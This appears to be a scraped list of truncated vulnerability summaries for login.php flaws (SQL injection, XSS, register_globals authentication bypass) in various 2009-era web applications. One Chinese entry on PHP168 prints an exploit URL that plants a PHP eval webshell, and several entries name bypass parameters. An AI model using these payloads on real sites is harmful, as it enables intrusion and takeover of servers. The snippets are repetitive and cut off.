CVE-2009-3758

CVE-2009-3758 is a SQL injection in login.php of the XenServer Resource Kit / XenCenterWeb. The vulnerability allows remote attackers to execute arbitrary SQL commands via the username parameter, as described in NVD/NIST and mirrored in multiple sources. Public exploit coverage is indicated by a ...

CVE-2009-3422

login.php in Zenas PaoLiber 1.1, when registerglobals is enabled, allows remote attackers to bypass authentication and gain administrative access by setting the loginok parameter to 1...

Authentication flaw

login.php in Zenas PaoLink 1.0, when registerglobals is enabled, allows remote attackers to bypass authentication and gain administrative access by setting the loginok parameter to 1...

CVE-2009-3423

CVE-2009-3423 affects Zenas PaoLink 1.0. When login_globals is enabled, an attacker can bypass authentication by setting the login_ok parameter to 1 in login.php, gaining administrative access. The NVD entry records a CVSSv2 base score of 6.8 (MEDIUM) with network attack vector and no authenticat...

CVE-2009-3423

login.php in Zenas PaoLink 1.0, when registerglobals is enabled, allows remote attackers to bypass authentication and gain administrative access by setting the loginok parameter to 1...

CVE-2009-3430

The CVE-2009-3430 entry concerns Allomani Mobile 2.5, where a SQL injection flaw in login.php allows remote attackers to manipulate the database by supplying crafted input in the username field during login. The vulnerability is caused by unsafely handling user input in the login action, enabling...

CVE-2009-3421

CVE-2009-3421 affects Zenas PaoBacheca Guestbook 2.1. The vulnerability is in login.php and arises when PHP register_globals is enabled. An attacker can bypass authentication and gain administrative access by setting the login_ok parameter to 1. The NVD notes a high-severity impact (confidentiali...

CVE-2009-3422

login.php in Zenas PaoLiber 1.1, when registerglobals is enabled, allows remote attackers to bypass authentication and gain administrative access by setting the loginok parameter to 1...

CVE-2009-3327

Multiple SQL injection vulnerabilities in WX-Guestbook 1.1.208 allow remote attackers to execute arbitrary SQL commands via the 1 QUERY parameter to search.php and 2 USERNAME parameter to login.php. NOTE: some of these details are obtained from third party information...

PHP168 6.0及以下版本login.php存在重大安全漏洞

PHP168整站系统一直以来受广大用户的亲睐，它凭借着自身的强大、稳定、安全、灵活、易用等多方面的优势 ... 架构与功能的不断完善，让PHP168成为了最主流CMS系统之一。 login.php参数处理不当，入侵者可以在用户登陆页面构造特殊语句，将PHP一句话写入cache目录，从而获得使用PHP168整站程序网站的WEBSHELL权限。 PHP168 6.0以下版本 暂无 等待官方补丁 login.php?makehtml=1&chdbhtmlname=honker.php&chdbpath=cache&content=?php%20@eval$POSThonker;?...

Property Watch 2.0 Cross Site Scripting

/ | | \ \ / / | | \ \ / / | |\ \ /\ / / | | | | | | \ V /| | | \ V V / | | || | || / ||| // ,|, | |/ | | | |/ / | ' \ | | / | | | | | | | |||,|| || || Property Watch v2.0 Remote XSS Vulnerabilities Discovered By : Moudi Contact : Download : http://www.propertywatchscript.com/ Greetings :...

CVE-2009-2928

CVE-2009-2928 is an XSS vulnerability in TGS Content Management 0.x, specifically in login.php, where the parameter previous_page can inject arbitrary script/HTML. This entry is supported by NVD details (description of XSS via previous_page) and does not include explicit exploit status or a publi...

CVE-2009-2921

CVE-2009-2921ffects MOC Designs PHP News 1.1. Multiple SQL injection vulnerabilities exist in login.php, exploitable via the newsuser (User) and newspassword (Password) fields. Remote attackers can cause arbitrary SQL execution. The provided documents do not specify the underlying root cause, aff...

CVE-2009-2921

Multiple SQL injection vulnerabilities in login.php in MOC Designs PHP News 1.1 allow remote attackers to execute arbitrary SQL commands via the 1 newsuser parameter User field and 2 newspassword parameter Password field...

CVE-2009-2883

An SQL injection vulnerability in SaphpLesson 4.0 (admin/login.php) can be triggered when magic_quotes_gpc is disabled, allowing remote attackers to execute arbitrary SQL via the cp_username parameter. The issue is related to an error in the CleanVar function in includes/functions.php. CVSS v2 ba...

WordPress-MU < 2.8.4 'wp-login.php' Security Bypass Vulnerability

WordPres-MU is prone to a security bypass vulnerability. Copyright C 2009 Greenbone Networks GmbH Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-or-later This program is free software; you...

Sql injection

Multiple SQL injection vulnerabilities in login.php in The Rat CMS Alpha 2 allow remote attackers to execute arbitrary SQL commands via the 1 userid and 2 password parameter...

CVE-2008-7003

Multiple SQL injection vulnerabilities in login.php in The Rat CMS Alpha 2 allow remote attackers to execute arbitrary SQL commands via the 1 userid and 2 password parameter...

Oracle Secure Backup Administration Server Authentication Bypass Vulnerability

This vulnerability allows remote attackers to bypass authentication on vulnerable installations of Oracle Secure Backup. User interaction is not required to exploit this vulnerability. The specific flaw exists in the logic used to authenticate a user to the administration server running on port...

CVE-2009-2780

Multiple cross-site scripting XSS vulnerabilities in 68 Classifieds 4.1 allow remote attackers to inject arbitrary web script or HTML via the 1 cat parameter to category.php, view parameter to 2 login.php and 3 viewlisting.php, page parameter to 4 searchresults.php and 5 toplistings.php, and 6...